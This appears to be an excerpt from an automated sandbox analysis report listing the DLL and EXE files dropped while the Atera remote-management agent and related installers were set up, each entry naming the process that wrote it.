                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.Core.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI432A.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI56F2.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\it\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Sinks.File.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Handles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\pl\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Extensions.Logging.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3FBB.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Tools.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-Hant\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5085.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2D79.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\t2tWinFormAppBarLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NetworkInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Writer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2D79.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileProviders.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.Mutex.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2D79.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.CommandLine.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3FBB.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NameResolution.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.IsolatedStorage.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Configuration.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.CommandLine.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Http.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cup.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5085.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 692c4c.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID178.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\QRCoder.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Options.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIADBF.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Hosting.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Console.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\CredentialManagement.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.EnvironmentVariables.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.SecureString.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\IdleTimeFinder.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\fr\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.ServiceProcess.ServiceController.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3FBB.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.Diagnostics.EventLog.Messages.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\clist.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Debug.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tracing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Xml.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI56F2.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CommunityToolkit.WinUI.Notifications.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlSerializer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Ping.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICB4C.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Windows\Temp\SplashtopStreamer.exeDropped PE file which has not been started: C:\Windows\Temp\unpack\PreVerCheck.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Agent.Package.Availability.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\de\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2FBD.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
